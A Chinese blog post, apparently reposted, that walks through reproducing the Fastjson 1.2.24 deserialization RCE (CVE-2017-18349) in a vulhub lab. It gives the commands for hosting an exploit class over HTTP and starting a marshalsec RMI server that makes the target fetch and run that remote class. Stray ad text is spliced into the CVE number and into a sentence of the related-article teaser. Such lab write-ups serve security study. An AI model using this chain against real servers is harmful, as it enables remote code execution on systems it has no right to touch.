怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017-18349)复现


这篇文章将为大家详细讲解有关怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017免费云主机域名-18349)复现,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。JSON,全称:JavaScript Object Notation,作为一个常见的轻量级的数据交换格式,应该在一个程序员的开发生涯中是常接触的。简洁和清晰的层次结构使得 JSON 成为理想的数据交换语言。 易于人阅读和编写,同时也易于机器解析和生成,并有效地提升网络传输效率。漏洞影响范围:fastjson
下面仅作漏洞复现记录与实现,利用流程如下:本文漏洞环境采用vulhub搭建,执行以下命令开启环境cd /vulhub/fastjson/1.2.24-rce/docker-compose up -d执行完毕后访问8090端口,访问如下:漏洞链接:http://192.168.101.152:8090/攻击机IP:192.168.101.131首先将exp进行编译,将以下内容保存为TouchFile.java之后使用javac编译为class文件,最好是用低版本的java编译,高版本可能利用不了,这里使用的是1.8版本编译完成后会得到一个TouchFile.class文件,然后在同目录下用python开启http服务,执行以下命令python -m http.server 8000然后借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class,执行以下命令java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.101.131:8000/#TouchFile” 9999之后使用burp发送特定poc数据包稍等一下可以可以看到访问152机子的请求过一会儿就可以看到dnslog收到了请求命令执行成功关于怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017-18349)复现就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

相关推荐: 将WAF部署在Nginx之后,真的效率最高吗?

Nginx是一款口碑非常不错的反向代理、负载均衡服务器。据说并发支持可达5万。在部署WAF时经常使用,常见的一种网络结构是:Nginx在最前端,做为反向代理、负载免费云主机域名均衡,Nginx后方,是业务服务器集群。本文通过实际测试,验证这种方法是否高效、有多…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 02/03 12:01
下一篇 02/03 12:01